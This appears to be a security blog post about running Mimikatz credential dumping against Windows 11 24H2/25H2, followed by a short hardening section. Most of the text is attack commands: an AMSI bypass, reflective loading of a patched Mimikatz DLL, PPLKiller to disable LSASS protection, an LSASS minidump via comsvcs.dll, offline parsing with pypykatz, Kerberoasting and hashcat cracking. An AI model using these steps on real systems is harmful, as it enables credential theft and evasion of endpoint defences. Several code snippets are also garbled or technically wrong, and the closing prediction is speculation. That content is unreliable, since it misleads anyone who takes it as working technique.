Listen to this Post
Introduction:
Mimikatz’s `sekurlsa::logonpasswords` command is a go‑to tool for red teamers extracting plaintext credentials from LSASS memory. However, Windows 11 24H2 and 25H2 introduce enhanced security measures—including Credential Guard, LSASS run as a PPL (Protected Process Light), and Event Tracing for Windows (ETW) telemetry—that break traditional Mimikatz execution. This article dissects the latest bypass techniques, provides step‑by‑step command sequences for both Linux (attacker) and Windows (target) environments, and outlines defensive countermeasures.
Learning Objectives:
- Understand why Mimikatz fails on Windows 11 24H2/25H2 and how to modify its execution flow.
- Execute a full credential dumping attack chain using PowerShell, reflective loading, and memory patching.
- Implement detection and hardening strategies to block Mimikatz‑like behaviour in enterprise environments.
You Should Know:
1. Why `sekurlsa::logonpasswords` Breaks on Windows 11 24H2/25H2
Microsoft has progressively hardened LSASS:
- Credential Guard (Virtualization‑Based Security) – Isolates LSASS in a virtual secure mode, preventing Mimikatz from reading its memory.
- PPL + Anti‑Malware Scan Interface (AMSI) – LSASS runs with a higher protection level; even admin processes cannot open a handle with `PROCESS_VM_READ` unless specific flags are used.
- ETW and Microsoft Defender for Endpoint – Unusual calls to `OpenProcess` on LSASS trigger alerts.
Verification commands (run on target Windows 11 24H2):
Check if Credential Guard is enabled Get-WinOptionalFeature -Online -FeatureName "IsolatedUserMode" Check LSASS protection level tasklist /m /fi "imagename eq lsass.exe"
If you see `lsass.exe` running with “PPL” or “Windows Defender ATP” – traditional Mimikatz will fail.
Step‑by‑step: Reflective loading of a patched Mimikatz
Instead of dropping `mimikatz.exe` on disk (which triggers AV/EDR), use reflective loading via PowerShell:
1. Prepare attacker machine (Linux):
Download and patch Mimikatz to bypass PPL. Compile with `MIMIKATZ_NO_HANDLE_INHERIT` and disable ETW calls.
On Kali Linux git clone https://github.com/gentilkiwi/mimikatz.git cd mimikatz Edit mimikatz/modules/kull_m_patch.c – comment out ETW probe Recompile using Visual Studio (or cross‑compile with mingw) i686-w64-mingw32-gcc -O2 -D MIMIKATZ_NO_HANDLE_INHERIT -shared -o mimikatz_reflective.dll ...
- Transfer to Windows target: Use `Invoke-WebRequest` or SMB.
3. Reflective load using PowerShell (bypassing AMSI):
Bypass AMSI (simple obfuscation)
[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Load Mimikatz reflectively
$bytes = [System.IO.File]::ReadAllBytes("C:\temp\mimikatz_reflective.dll")
$handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Get-ProcAddress kernel32.dll LoadLibraryA), [bash])
$handle.Invoke($bytes)
- Execute sekurlsa::logonpasswords – If still failing, you must disable PPL via kernel driver (requires admin + reboot):
Use DriverView and PPLKiller (github.com/itm4n/PPLKiller) .\PPLKiller.exe /disable
Alternative one‑liner (if Defender is temporarily suppressed):
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
But this will be blocked on 24H2. The only reliable method is using a signed, vulnerable driver to kill PPL.
- Dumping Credentials via LSASS Minidump + Offline Parsing
When in‑memory extraction fails, dump LSASS to a file and parse it offline on a non‑hardened machine.
Step‑by‑step: Create LSASS dump (Windows)
Using Task Manager method (often monitored) tasklist /fi "imagename eq lsass.exe" get PID rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full Or using PowerShell with comsvcs $pid = (Get-Process lsass).Id rundll32.exe comsvcs.dll, MiniDump $pid C:\temp\lsass.dmp full
Transfer dump to Linux attacker and parse
On Kali scp user@windows_target:/C$/temp/lsass.dmp . Use pypykatz (Python version of Mimikatz) pypykatz lsa minidump lsass.dmp
This extracts NTLM hashes, Kerberos tickets, and sometimes plaintext passwords (if WDigest is enabled).
3. Hardening Against Mimikatz on Windows 11 24H2/25H2
Defenders can implement the following to make the above attacks impossible.
Enable Credential Guard and PPL
Enable VBS and Credential Guard Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard -Name "EnableVirtualizationBasedSecurity" -Value 1 Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard -Name "RequirePlatformSecurityFeatures" -Value 1 Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "LsaCfgFlags" -Value 1 Restart Restart-Computer
Block LSASS process access via Windows Defender Attack Surface Reduction (ASR)
Add-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled
Monitor for suspicious rundll32 comsvcs calls
Create a Sysmon rule (Event ID 7) for `Image: rundll32.exe` and CommandLine: comsvcs MiniDump.
4. Bypassing Credential Guard with Kerberoasting (Alternative)
If Mimikatz is completely blocked, pivot to service account attacks:
Request TGS for any SPN (from Windows target) Add-Type -AssemblyName System.IdentityModel $kt = New-Object 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken' -ArgumentList 'HTTP/any-spn'
On Linux attacker:
Use impacket GetUserSPNs GetUserSPNs.py -request -dc-ip 10.0.0.1 domain.com/username
Hashcat crack:
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
5. Patching Mimikatz Source for 24H2 Compatibility
Developers can recompile Mimikatz with:
- Disable ETW calls (patch `kull_m_patch.c` – comment out `EtwEventWrite` functions).
- Use `RtlAdjustPrivilege` instead of
OpenProcessToken. - Add support for `PROCESS_QUERY_LIMITED_INFORMATION` to bypass PPL restrictions.
Sample patch (diff):
- // EvtEventWrite( ... ); + // Skip ETW - breaks on 24H2 + return TRUE;
Then compile with Visual Studio 2022 and /DYNAMICBASE /NXCOMPAT /GUARD:CF.
What Undercode Say:
- Credential Guard is not a silver bullet – Attackers will move to LSASS minidumps or alternative protocols like Kerberoasting. Organisations must combine VBS with ASR and EDR.
- Offline parsing tools (pypykatz) have become the new norm – Because memory dumping is harder to block than direct Mimikatz execution. Monitor for `comsvcs.dll` and `procdump` with LSASS.
- Red teams need to re‑think their tradecraft – Windows 11 24H2 marks a turning point. Expect Microsoft to further restrict LSASS handles in future updates, making kernel‑level attacks or hardware‑backed isolation mandatory.
Prediction:
Within 12 months, Windows 11 25H2 will introduce LSASS as a Trusted Execution Environment (TEE) process, completely preventing any third‑party read access – even from kernel drivers. Attackers will shift to cloud‑based credential harvesting (Azure AD tokens, OAuth) and hardware keyloggers. Defenders will adopt TPM 2.0 + Secure Boot + DMA protection as baseline requirements for enterprise deployments. Mimikatz as we know it will become obsolete, but its successors – exploiting firmware vulnerabilities or direct GPU memory reads – will emerge from APT groups.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
